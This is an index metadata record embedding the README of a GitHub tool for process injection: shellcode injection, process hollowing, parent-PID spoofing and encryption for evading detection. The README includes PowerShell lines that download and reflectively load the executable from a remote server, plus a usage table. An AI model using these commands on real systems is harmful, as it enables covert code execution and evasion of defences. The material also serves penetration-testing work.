{"id":13839820,"url":"https://github.com/3xpl01tc0d3r/ProcessInjection","last_synced_at":"2025-07-11T06:31:46.054Z","repository":{"id":43175028,"uuid":"205578957","full_name":"3xpl01tc0d3r/ProcessInjection","owner":"3xpl01tc0d3r","description":"This program is designed to demonstrate various process injection techniques","archived":false,"fork":false,"pushed_at":"2023-08-30T12:54:50.000Z","size":110,"stargazers_count":1075,"open_issues_count":0,"forks_count":183,"subscribers_count":35,"default_branch":"master","last_synced_at":"2024-11-12T16:11:55.838Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/3xpl01tc0d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-08-31T17:58:54.000Z","updated_at":"2024-11-09T01:33:38.000Z","dependencies_parsed_at":"2024-01-22T04:48:26.923Z","dependency_job_id":null,"html_url":"https://github.com/3xpl01tc0d3r/ProcessInjection","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3xpl01tc0d3r%2FProcessInjection","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3xpl01tc0d3r%2FProcessInjection/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3xpl01tc0d3r%2FProcessInjection/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/3xpl01tc0d3r%2FProcessInjection/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/3xpl01tc0d3r","download_url":"https://codeload.github.com/3xpl01tc0d3r/ProcessInjection/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225700116,"owners_count":17510439,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:35.827Z","updated_at":"2024-11-21T08:31:35.279Z","avatar_url":"https://github.com/3xpl01tc0d3r.png","language":"C#","readme":"# ProcessInjection\n\n----\n\nThe program is designed to perform process injection.\nCurrently the tool supports 4 process injection techniques.\n\n```\n1) Vanilla Process Injection\n2) DLL Injection\n3) Process Hollowing\n4) APC Queue\n```\n\nThe tool accepts shellcode in 4 formats.\n\n```\n1) base64\n2) hex\n3) c\n4) raw\n```\n\nThe tool supports 2 methods to perform process injection.\n\n```\n1) P/Invoke\n2) D/Invoke\n```\n\nSupports 3 detection evading techniques.\n\n```\n1) Parent PID Spoofing\n\nEncryption\n2) XOR Encryption (It can also be used with Parent PID Spoofing technique but can't be used with DLL Injection Technique)\n3) AES Encryption (It can also be used with Parent PID Spoofing technique but can't be used with DLL Injection Technique)\n```\n\nCan be loaded via reflection.\n\n```\n# Load from the disk\n[System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes(\"ProcessInjection.exe\"));\n\n# Load from a remote server\n[System.Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData(\"http://\u003cURL\u003e/ProcessInjection.exe\"))\n\n# Perform process injection\n[ProcessInjection.ProcessInjection]::Main(@(\"/t:1\", \"/f:base64\", \"/pid:\u003cProcessId\u003e\", \"/sc:\u003cShellCode\u003e\"))\n```\n\n### Command Line Usage\n\n```\nUsage           Description\n-----           -----------\n/t              Specify the process injection technique id.\n                1 = Vanilla Process Injection\n                2 = DLL Injection\n                3 = Process Hollowing\n                4 = APC Queue Injection\n/m              Specify the method to be used\n                p = P/Invoke (Default)\n                d = D/Invoke\n/f              Specify the format of the shellcode.\n                base64\n                hex\n                c\n                raw\n/pid            Specify the process id.\n/parentproc     Specify the parent process name.\n/path           Specify the path of the file that contains the shellcode.\n/ppath          Specify the path of the executable that will be spawned (Mandatory while using /parentproc argument).\n/url            Specify the url where the shellcode is hosted.\n/enc            Specify the encryption type (aes or xor) in which the shellcode is encrypted.\n/key            Specify the key that will be used to decrypt the shellcode.\n/sc             Specify the shellcode directly in base64 or hex format. Note: To pass large shellcode please leverage reflection to run the program.  \n/help           Show help\n```\n\n### Blog Post\n\n[https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html](https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html)\n\n[https://3xpl01tc0d3r.blogspot.com/2019/09/process-injection-part-ii.html](https://3xpl01tc0d3r.blogspot.com/2019/09/process-injection-part-ii.html)\n\n[https://3xpl01tc0d3r.blogspot.com/2019/10/process-injection-part-iii.html](https://3xpl01tc0d3r.blogspot.com/2019/10/process-injection-part-iii.html)\n\n[https://medium.com/@r3n_hat/parent-pid-spoofing-b0b17317168e](https://medium.com/@r3n_hat/parent-pid-spoofing-b0b17317168e)\n\n[https://3xpl01tc0d3r.blogspot.com/2019/12/process-injection-part-v.html](https://3xpl01tc0d3r.blogspot.com/2019/12/process-injection-part-v.html)\n\n[https://3xpl01tc0d3r.blogspot.com/2020/08/process-injection-tool-updates.html](https://3xpl01tc0d3r.blogspot.com/2020/08/process-injection-tool-updates.html)\n\n\n### Contribution Credit\n\n[Renos](https://twitter.com/r3n_hat)\n\nCredits also goes to :\n\n[Aaron Bray](https://github.com/ambray) \u0026 [Rasta Mouse](https://twitter.com/_rastamouse) for Process Hollowing code\n\n[The Wover](https://twitter.com/TheRealWover) \u0026 [b33f](https://twitter.com/FuzzySec) for Dynamic Invoke - (https://thewover.github.io/Dynamic-Invoke/)\n","funding_links":[],"categories":["C# #","C# (212)","其他_安全与渗透","Pentesting"],"sub_categories":["网络服务_其他","ShellCodes"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3xpl01tc0d3r%2FProcessInjection","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F3xpl01tc0d3r%2FProcessInjection","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3xpl01tc0d3r%2FProcessInjection/lists"}